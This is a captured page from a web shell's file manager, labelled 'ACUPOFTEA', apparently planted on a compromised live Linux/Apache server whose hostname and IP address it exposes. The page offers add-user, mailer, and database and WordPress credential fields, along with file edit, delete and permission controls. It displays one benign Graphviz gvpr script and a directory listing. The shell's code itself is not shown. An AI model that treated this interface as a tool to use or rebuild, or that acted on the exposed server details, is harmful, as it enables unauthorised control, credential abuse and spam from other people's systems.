System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
share
/
graphviz
/
gvpr
/
216.73.216.49
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
binduce
/* Given a bipartite graph, induce a non-bipartite graph. * argv[0]="name=value" This is used to identify the nodes used * to induce edges. If aget(n,name) == value, * if deg(n) == 1, delete * if deg(n) == 2, delete and connect to neighbor with edge * if deg(n) > 2, delete and add edge between all pairs of neighbors * Add weights to edge. */ BEGIN{ int i, cnt; int wt[edge_t]; string values[int]; node_t nbrs[int]; edge_t e; tokens(ARGV[0],values,"="); string aname = values[0]; string value = values[1]; printf(2, "%s=%s\n", aname, value); } N[aget($,aname)==value] { if ($.degree > 1) { cnt = 0; for (e = fstedge($); e; e = nxtedge(e, $)) nbrs[cnt++] = opp(e,$); for (i = 0; i < cnt-1; i++) { if ((e = isEdge(nbrs[i],nbrs[i+1],"")) != NULL) { wt[e] += 1; } else if ($G.directed && (e = isEdge(nbrs[i+1],nbrs[i],""))) { wt[e] += 1; } else if (nbrs[i] != nbrs[i+1]) { // avoid loops e = edge(nbrs[i],nbrs[i+1],""); wt[e] = 1; } } unset(nbrs); } delete($G,$); } END_G{ for (wt[e]) { e.multiplicity = sprintf ("%d", wt[e]); } }
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-24 12:46:47
..
DIR
-
drwxr-xr-x
2024-04-06 12:47:12
addedges
text/plain
291 B
-rw-r--r--
2024-04-06 12:47:07
addranks
text/plain
830 B
-rw-r--r--
2024-04-06 12:47:07
addrings
text/plain
1.29 KB
-rw-r--r--
2024-04-06 12:47:07
anon
text/plain
422 B
-rw-r--r--
2024-04-06 12:47:07
attr
text/plain
151 B
-rw-r--r--
2024-04-06 12:47:07
bb
text/plain
997 B
-rw-r--r--
2024-04-06 12:47:07
bbox
text/plain
532 B
-rw-r--r--
2024-04-06 12:47:07
binduce
text/plain
1.14 KB
-rw-r--r--
2024-04-06 12:47:07
bipart
text/plain
455 B
-rw-r--r--
2024-04-06 12:47:07
chkclusters
text/plain
532 B
-rw-r--r--
2024-04-06 12:47:07
chkedges
text/plain
916 B
-rw-r--r--
2024-04-06 12:47:07
cliptree
text/plain
178 B
-rw-r--r--
2024-04-06 12:47:07
col
text/plain
601 B
-rw-r--r--
2024-04-06 12:47:07
collapse
text/plain
469 B
-rw-r--r--
2024-04-06 12:47:07
color
text/plain
1.41 KB
-rw-r--r--
2024-04-06 12:47:07
cycle
text/plain
560 B
-rw-r--r--
2024-04-06 12:47:07
dechain
text/plain
264 B
-rw-r--r--
2024-04-06 12:47:07
deghist
text/plain
351 B
-rw-r--r--
2024-04-06 12:47:07
deledges
text/plain
116 B
-rw-r--r--
2024-04-06 12:47:07
delmulti
text/plain
397 B
-rw-r--r--
2024-04-06 12:47:07
delnodes
text/plain
249 B
-rw-r--r--
2024-04-06 12:47:07
depath
text/plain
547 B
-rw-r--r--
2024-04-06 12:47:07
dijkstra
text/plain
647 B
-rw-r--r--
2024-04-06 12:47:07
flatten
text/plain
88 B
-rw-r--r--
2024-04-06 12:47:07
get-layers-list
text/plain
277 B
-rw-r--r--
2024-04-06 12:47:07
group
text/plain
791 B
-rw-r--r--
2024-04-06 12:47:07
histogram
text/plain
319 B
-rw-r--r--
2024-04-06 12:47:07
indent
text/plain
378 B
-rw-r--r--
2024-04-06 12:47:07
knbhd
text/plain
1.2 KB
-rw-r--r--
2024-04-06 12:47:07
maxdeg
text/plain
307 B
-rw-r--r--
2024-04-06 12:47:07
path
text/plain
449 B
-rw-r--r--
2024-04-06 12:47:07
rotate
text/plain
1.17 KB
-rw-r--r--
2024-04-06 12:47:07
scale
text/plain
1.12 KB
-rw-r--r--
2024-04-06 12:47:07
scalexy
text/plain
1.1 KB
-rw-r--r--
2024-04-06 12:47:07
span
text/plain
139 B
-rw-r--r--
2024-04-06 12:47:07
topon
text/plain
429 B
-rw-r--r--
2024-04-06 12:47:07
treetoclust
text/plain
988 B
-rw-r--r--
2024-04-06 12:47:07
~ ACUPOFTEA - mail.ontime-ae.com